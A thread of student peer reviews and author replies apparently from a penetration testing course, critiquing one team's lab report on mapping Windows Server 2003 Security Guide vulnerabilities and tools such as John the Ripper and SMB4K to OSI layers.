Team 5’s abstract was decent but their description was hard to relate to. The writing was hard to read and to understand exactly what they were trying to convey. The team did a nice job with their introduction in that they tied this lit review back to previous labs. This was good because it shows an understanding that this course has been set up for each lab to build upon the previous lab. The team did a good job of writing a cohesive literature review; however, not all the questions were answered.
Team 5’s methods section is somewhat complete. Additional information would have helped make it better for me to understand.
The team mentions that most of the vulnerabilities are found in the OSI 7 layer model, but gives little detail as to why this occurred.
In their conclusion team 5 does a nice job of talking about what they learned from the lab and mentioned that the documents used to secure a system could be used to find weaknesses in other systems. They do make a very good point in the end that these security documents are just guides and should be used with caution.
Team five has presented a well-constructed and reasonably thorough lab write-up. It was interesting that this team included their chosen guide in the literature review: a unique approach. The ‘Methodology’ section for the most part left few questions as to how the exercise was accomplished. I found the ‘Findings’ section nicely done, with descriptions of vulnerabilities and layer-level selections well chosen.
With these positive points in mind, more than a few areas which could benefit from improvement exist in this team’s report. Foremost, the literature review appeared lacking in some regards. I found that very little of each article was actually discussed. For the most part, a single concept was pulled from each article, and then tied in some way to the lab exercise. I believe this made for a discussion with almost no depth, further limited by the large amount of attention given to the team’s security document within this section. It would have made more sense to skip the review of the security document here (as it is being examined at length in the ‘entire’ rest of the lab exercise) and to delve into the other articles in more depth.
Although a ‘second run’ of attack tools (a before and after approach) was mentioned in the ‘Methodology’ section, I saw no indication present anywhere within the document that this was actually done. It also appeared that some methodology was likely contained within the ‘Results’ section, as the very last portion of this section surprises the reader with a fair amount of information regarding ‘how’ a test was being conducted. Additionally, I was left to wonder why exactly a Windows XP host was also tested in this section, as this team’s entire document is concerned with Server 2003: this ‘XP’ test seemed spurious with regard to the stated goal of the exercise. It would have improved this team’s report if a more detailed description of the tests being done had been included in the ‘Methodology’ section.
Furthermore, while I found this team’s discussion of good quality with respect to the change issues, somehow, the tables appeared lacking in my eyes. Rather than double listing information discussed in the results section again into a table, it might have been better to devise some way to provide all the information in ‘one’ comprehensive listing. Additionally, the actual ‘exploit’ tool list was quite short. This could have been forgiven if some new, rare, or unique tools were presented here, but this was not the case: all the tools appear of a generic nature, with no ‘specific’ vulnerabilities addressed. It seems likely that in a typical penetration testing situation, all of these tools would be tried as normal procedure: so then what of worth was gained from reverse engineering the security document?
Finally, it seems odd that the same tools used in OSI layer six of this team’s table should also appear in layer eight, the ‘People’ layer. Should not the eighth layer rely on non-technology ‘people’ tools? How would you propose to use ‘John the Ripper’ against passwords stored in people’s heads? I believe the inclusion of such tools in this layer to be an error on this team’s part.
Overall, team five’s lab report was well written. I just found a few instances where the voice ranged from the past tense, which is required by APA 5, to the present. Try to keep the voice unified.
Team five’s abstract gave a somewhat general overview of what was accomplished in the laboratory assignment. The team did not mention what operating system or what specific document was to be used.
In the literature review section, team five gave a justification for finding vulnerabilities without tools when they stated, “In lab three we saw that exploit tools could be the source of additional security risks if they are not properly analyzed by experts so, based on the circumstances, we may need the ability to exploit a network without any tools.” The team further emphasized their point by stating, “Technical tools have limitations that make their use limited in a penetration testing environment. The tools will often return either too many results for the tester to sort through or, worse yet, identify false positives (Wales, 2003, p. 16) which could waste precious testing time.” Besides giving summaries of the different articles and relating them to each other and to this laboratory assignment as well as other assignments of the past, the group also identified the document that they analyzed, which was the Windows Server 2003 Security Guide.
In the methodology section, group five further described the recommendation guide that they analyzed by stating, “The guide consists of thirteen chapters and four appendices that focus on security countermeasures for Windows Server 2003, the vulnerabilities that they address, and the negative impacts that the countermeasures could have on the operation of the system.” Group five used a good strategy for testing vulnerabilities in their Windows Server 2003 virtual machine. The team stated, “First the tool will be run against the server with the default security configuration to test the presence of the vulnerability. Secondly, we will implement the countermeasure described in the security guide and run the tool again to determine if the proposed countermeasure sufficiently mitigates the vulnerability.”
In the findings section, group five was one of the few groups to actually describe where most of the tabulated data fell within the OSI model. Team five found that most of the vulnerabilities were in the application and session layers. Team five then described some of the vulnerabilities, which were arranged by the layer at which they occur in the OSI model. When the group described testing and stated that “Using John the ripper it allows the user running the program to gain user and password information”, was the tool able to exploit the system both before and after the recommendations were used to harden the team’s Windows Server 2003 virtual machine? The group used the SMB4K tool against their virtual machine, but did not state whether the tool worked after the recommendations were implemented. The group also tried to use the SMB4K tool against Windows XP but was not able to get the same results due to the firewall included with Service Pack 3. I wonder if the tool would work against Windows XP with Service Pack 0.
In the issues section, the group just described how they changed their strategy for analyzing their document.
In the conclusion section, group five made a good point when they stated “The research also pointed out that by relying solely on a document such as this, a responsible system administrator or penetration tester still needs to ensure the completeness of what the guide covers and the correctness of the countermeasures employed.”
Team 5 begins their lab 5 report by stating that lab 5 builds on the previous labs by discussing the vulnerabilities found within systems using security white papers to gain information. After the brief abstract they proceed with the literature review. They introduce this section by stating that the previous labs involved gathering information from the networks using active and passive reconnaissance, and that “The data gathered can be used to select tools that can be used to exploit the systems based on preexisting vulnerabilities or to select tools to find vulnerabilities that don’t exist.” I’m not sure I understand the last part of this sentence. How do you “find vulnerabilities that don’t exist”? Team 5 continues with a conglomeration of the various reading assignments for this week, mixed with discussions of lab 5 and the other laboratory assignments. Team 5 seemed to go into a lot more detail concerning the laboratory assignments in the literature review than they did the reading assignments. I do believe that they touched on (what I believe to be) the common thread that ties the reading assignments and this week’s lab assignment together: a penetration tester needs to go beyond simply using a tool to scan for open ports or sniff traffic off of the network. It requires knowledge of application and system vulnerabilities, and how these vulnerabilities can be used together to breach the security of a system. I believe Team 5 made a good point that blindly applying security patches without a solid understanding of the system and the vulnerabilities that the patch is designed to protect against could cause more problems.
In the methodology section, Team 5 begins by discussing the security documentation that they chose to review for this lab; the Security Configuration Guide for Windows 2003 Server from Microsoft. They discuss the three different levels of security that were presented in the documentation; legacy client, enterprise client, and specialized security/limited functionality (SSLF). They decided to use the enterprise client security level. They identified the vulnerabilities addressed in the documentation and classified them by their location in the OSI Model and McCumber Cube. They will match the vulnerability to the exploit tool, and run the exploit tool against the Windows 2003 Server to test the vulnerability. Next, they will implement the countermeasures that were recommended in the documentation and run the tool again to verify that the countermeasure worked.
Team 5 then begins their findings section with a brief description of the tables that they created, which organize the vulnerabilities by OSI layer and McCumber cube coordinates. Each of the vulnerabilities contains a title and description, making it easy to understand what it intends to accomplish. A nice touch is the addition of the page numbers where the vulnerabilities can be found within the documentation. This would make it easy to locate in the event that further explanation or verification is needed. They then discussed the tools that they used to test the vulnerability of the system, such as John the Ripper and SMB4K. They conclude by restating that there are risks with blindly following the configurations recommended in security documentation. A system administrator should understand the configurations and why they need to be applied.
I think that group 5’s write-up for lab 5 was adequate. The abstract for this lab was good and provided a good overview of the lab. The literature review was very good in terms of summarizing the readings. Group 5 chose to write the literature review as one big comprehensive review, which is good; however, absolutely none of the required questions were answered. It seemed as if the literature review was nothing more than a summary of the required readings and did not include whether the group agreed or disagreed with the readings, any speculation about the research methodology, or any errors or omissions, though they did indicate how it relates to the laboratory. All of the citing for the literature review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail about the security configuration guide for Windows Server 2003 that they used. The group also included a very extensive table that indicates many vulnerabilities found in the document and how they relate to the McCumber cube. For the tools section, there were very few. Many more tools could be applied or at least considered to be possible for some use. Although the group did test their hypothesis of exploits, they included SMB4K as a tool used to exploit the system (included in the exploit tool section under layer 5). This tool is only a graphical SMB browser and does not perform any exploits. The group also included tcptraceroute as a denial of service tool when it only performs enumeration and firewall evasion. The conclusion was well written and accurately summarizes what was covered. Overall, most of the required questions were answered and answered well; however, there seemed to be a little confusion about exploits and the functions of certain tools.
The team starts out with a strong abstract and they talk about the availability of white papers for security configurations and how they are available for download at many vendors’ websites as well as from the National Institute of Standards and Technology (NIST). This team reviewed the security configuration guide for Windows Server 2003 from Microsoft. This document is split into three different categories, unlike Team 4’s document, which only had two. The three different levels are legacy client, enterprise client, and specialized security/limited functionality (SSLF). The team nicely laid out the different exploits and gave an explanation of each. In the table, the team identified where each vulnerability fits in the McCumber coordinates. Like most other groups, they have identified the majority of the tools as being in layer 7. In the second table the first vulnerability is guess/discover old password, using the exploit tools L0phtCrack and John the Ripper, and according to the chart it is a layer 8 exploit. My question is, how is this software at the people layer? Perhaps talking to a person and getting them to reveal their password to you would be a layer 8 exploit. Walk into their place of work and impersonate an IT administrator, informing that user that you have been sent there to audit them exclusively. This would perhaps cause them to panic and answer any question that you have, such as their username and password. This would be a complete layer 8 exploit: no need for software, just a suit and an ID. Some systems only allow users to guess up to three times before they are locked out of their account. Tools that guess the password would have to guess correctly in the first three tries or the user would be locked out. A popular exploit among all groups seems to be the denial of service attack. This group has the denial of service exploit in layer 4, while Team 3 has it in layer 7; which OSI layer fits best?
Team five for lab five presents an abstract that, aside from the grammatical errors, gives a good overview of the process team five will follow to complete their lab. However, this abstract does not meet the requirements of the syllabus as it is only one paragraph; the syllabus states that any abstract less than two paragraphs will be judged as poor scholarship. The literature review presented by team five has a good level of cohesion among the articles. While I feel there could have been more cohesion, they did a decent job. The literature review seems to break the articles into their respective subcategories, with the articles in each subcategory reviewed against each other, not as a whole. Team five does, based on previous labs, strive for a very cohesive literature review, and as such they do not really need to improve in this area. The methods that team five used do not show a strategy for completion or an overall technique that was used, but rather just the steps to be completed. While this serves to show the other teams what team five did, it makes it almost impossible for others to reproduce the results team five generated. This does not make for an academic or scholarly methods section. In the findings presented by team five, they explain what their tables are, what they are used for, and how they generated them. They then go on to list the possible vulnerabilities of their table in a list broken down by OSI layer. I agree with their layer eight, seven, five, four, three, and one lists. I disagree with their layer six and two lists. I do not believe that password cracking and privilege escalation happen at layer six, nor do I believe that system volumes and system drivers exist at layer two. These same problems are replicated in table form in their tables section. I also do not see the value in creating both a list of the recommendations that their document provided and a table. The list works to generate some discussion through explanation, but the table lists the recommendations in a succinct form. As graduate students and information technology or information security professionals, the information provided in the table should be more than enough to generate an attack. I agree with the conclusions drawn by team five, not just in that they could be based on the methods they provided, but in their ideas as well. Lab five was a definite eye opener, and it is very true that if everyone followed the same guides to secure their systems, everyone would be vulnerable to the same attacks should someone, like a graduate of this course or program, do what has been done here. Team five, like team four, also did not give any mention to the approval process for their chosen document in their methods section. Because teams one, two, and three did, I find that to be questionable. All in all, the lab report generated by team five, while lacking in some areas, was very well written and discussed in others.
@anyone disagreeing with the “guess/discover old password” tools in layer 8 – Agreed. JtR wouldn’t work well against someone’s brain. Social engineering would be a better tool to use here.
@mborton – Your criticism of the conclusion is valid. I think the statement would’ve been better stated: “The literature review showed us how reverse engineering a system could lead to quicker identification of vulnerabilities. Security configuration guides, by promoting a one-sided way of approaching the security of a system, allow us to quickly identify vulnerabilities that will likely be present in a target’s system.”
@mvanbode – we’ve talked about the OS/security cycle before in previous labs and maybe that could’ve been referenced. security is a journey….not a destination.
@gdekkerj – we felt the double listing allowed us to synthesize the information in tabular format to show the context within the OSI and McCumber cubes. The list allowed us to discuss the vulnerability in depth without making the table too large and cluttered. On that note, I did like how your group gave each vulnerability a unique ID in your table that was referenced later for the description.
@dkender – good catch with the “vulnerabilities that don’t exist.” We were discussing “known” and “unknown” vulnerabilities, very poor word choice there. It would’ve been better stated “vulnerabilities that we don’t know exist.”
@nbakker – Our reasoning for placing device drivers at layer two was that it’s where the operating system interfaces with the hardware. Sun Microsystems agrees (http://docs.sun.com/app/docs/doc/805-4041/6j3r8iu2e?a=view). As to the criticism of not including the document approval process, we felt it had little impact on the outcome of the lab. Anyone recreating the lab exercises would likely not need to get approval of the document they chose to evaluate.